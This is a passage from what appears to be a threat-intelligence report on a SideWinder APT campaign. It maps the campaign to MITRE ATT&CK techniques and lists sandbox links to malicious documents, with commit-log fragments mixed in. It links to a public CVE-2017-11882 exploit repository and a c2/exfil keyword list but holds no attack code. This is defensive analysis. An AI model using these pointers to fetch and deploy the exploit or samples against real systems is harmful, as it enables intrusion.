<h6>The process graph resume cyber kill chains used by the attacker :</h6>
<p align="center">
<img src="https://raw.githubusercontent.com/StrangerealIntel/CyberThreatIntel/master/Indian/APT/SideWinder/25-12-19/Pictures/Cyber.png">
</p>
<h2> Indicators Of Compromise (IOC) <a name="IOC"></a></h2>
<h6> List of all the Indicators Of Compromise (IOC)</h6>
|Indicator|Description|
| ------------- |:-------------:|
|||
<h6> The IOC can be exported in <a href="">JSON</a></h6>
<h2> References MITRE ATT&CK Matrix <a name="Ref-MITRE-ATTACK"></a></h2>
|Enterprise tactics|Technics used|Ref URL|
| :---------------: |:-------------| :------------- |
|Execution|Execution through Module Load<br>Exploitation for Client Execution|https://attack.mitre.org/techniques/T1129/<br>https://attack.mitre.org/techniques/T1203/|
|Persistence|Registry Run Keys / Startup Folder|https://attack.mitre.org/techniques/T1060/|
|Discovery|Query Registry|https://attack.mitre.org/techniques/T1012/|
<h6> This can be exported as JSON format <a href="https://github.com/StrangerealIntel/CyberThreatIntel/blob/master/Indian/APT/SideWinder/25-12-19/JSON/MITRE_ref.json">Export in JSON</a></h6>
<h2>Yara Rules<a name="Yara"></a></h2>
<h6> A list of YARA Rule is available <a href="">here</a></h6>
<h2>Knowledge Graph<a name="Knowledge"></a></h2><a name="Know"></a>
<h6>The following diagram shows the relationships of the techniques used by the groups and their corresponding malware:</h6>
<p align="center">
<img src="">
</p>
<h2>Links <a name="Links"></a></h2>
<h6> Original tweet: </h6><a name="tweet"></a>
* [https://twitter.com/RedDrip7/status/1206898954383740929](https://twitter.com/RedDrip7/status/1206898954383740929)
<h6> Links Anyrun: <a name="Links-Anyrun"></a></h6>
* [Policy on Embedded Systems.doc](https://app.any.run/tasks/1fac2867-012c-4298-af36-a4810d9b72db)
* [adsfa.rtf](https://app.any.run/tasks/72ec8c7c-5542-48fe-8400-ba840de9c0bd)
* [out.rtf](https://app.any.run/tasks/34c8345c-b661-4ca5-ba15-58dcc4e6d968)
<h6> Resources : </h6><a name="Ressources"></a>
* [The SideWinder campaign continue](https://github.com/StrangerealIntel/CyberThreatIntel/blob/master/Indian/APT/SideWinder/11-10-2019/Analysis.md)
Update analysis.md
2019-12-27 19:23:58 +00:00
* [CVE-2017-11882](https://github.com/embedi/CVE-2017-11882)dz
Update analysis.md
2019-12-27 23:00:17 +00:00
* [A repo for matching on known c2 and exfil traffic keywords](https://github.com/silence-is-best/c2db)
Reference in New Issue Copy Permalink